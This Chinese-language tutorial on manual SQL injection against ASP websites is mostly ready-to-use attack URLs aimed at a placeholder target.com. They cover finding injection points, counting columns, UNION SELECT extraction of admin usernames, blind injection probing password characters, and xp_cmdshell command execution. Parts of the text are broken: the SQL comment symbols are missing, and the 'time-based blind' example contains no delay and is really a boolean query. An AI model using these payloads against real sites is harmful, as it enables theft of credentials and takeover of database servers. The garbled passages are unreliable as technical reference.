ASP手注语法有哪些核心命令？

在Web安全领域,手注技术是渗透测试中不可或缺的环节，而ASP（Active Server Pages）作为经典的Web开发技术，其手注语法具有独特的逻辑和结构，本文将围绕ASP手注语法的核心原理、常用技巧及注意事项展开，帮助读者系统掌握这一技术。

ASP手注语法基础

ASP手注的核心在于利用SQL语句漏洞,通过构造特殊输入参数，欺骗数据库执行非预期操作，与PHP或JSP不同，ASP环境通常使用Access或SQL Server数据库，其语法差异直接影响手注策略，Access数据库的注释符为，而SQL Server支持或，这一细节在闭合查询语句时需特别注意。

判断注入点
通过单引号测试数据库报错，若返回错误信息则存在注入漏洞。
http://target.com/news.asp?id=1'
若页面显示“SQL语法错误”等提示，则确认注入点存在。
获取字段数
使用ORDER BY子句判断查询字段数量，如：
http://target.com/news.asp?id=1 ORDER BY 10--
逐步递增数字，直至页面报错，最后一个未报错的数字即为字段数。
显示位确定
通过UNION SELECT联合查询，结合NULL填充字段，确定回显位置。
http://target.com/news.asp?id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
观察页面中数字2、3等是否正常显示，以确定数据输出位置。
关键信息获取
利用系统表或配置表提取敏感数据，针对SQL Server数据库，可查询sysobjects和syscolumns表：
http://target.com/news.asp?id=1 UNION SELECT 1,username,3,4,5,6,7,8,9,10 FROM admin--
若为Access数据库，则需使用MSysObjects系统表（需开启权限）。

盲注应用
当无法直接回显数据时，可采用布尔盲注或时间盲注，布尔盲注示例：
http://target.com/news.asp?id=1 AND (SELECT COUNT(*) FROM admin WHERE username='admin')>0--
通过页面返回差异判断条件真假，时间盲注则使用WAITFOR DELAY：
http://target.com/news.asp?id=1 AND 1=(SELECT COUNT(*) FROM admin WHERE username='admin' AND ASCII(SUBSTRING(password,1,1))=97)--
若密码首字母为a，页面将延迟响应。
权限提升
在SQL Server中，可通过xp_cmdshell执行系统命令：
http://target.com/news.asp?id=1; EXEC master.dbo.xp_cmdshell 'dir c:'--
需确保当前数据库用户具有sysadmin权限。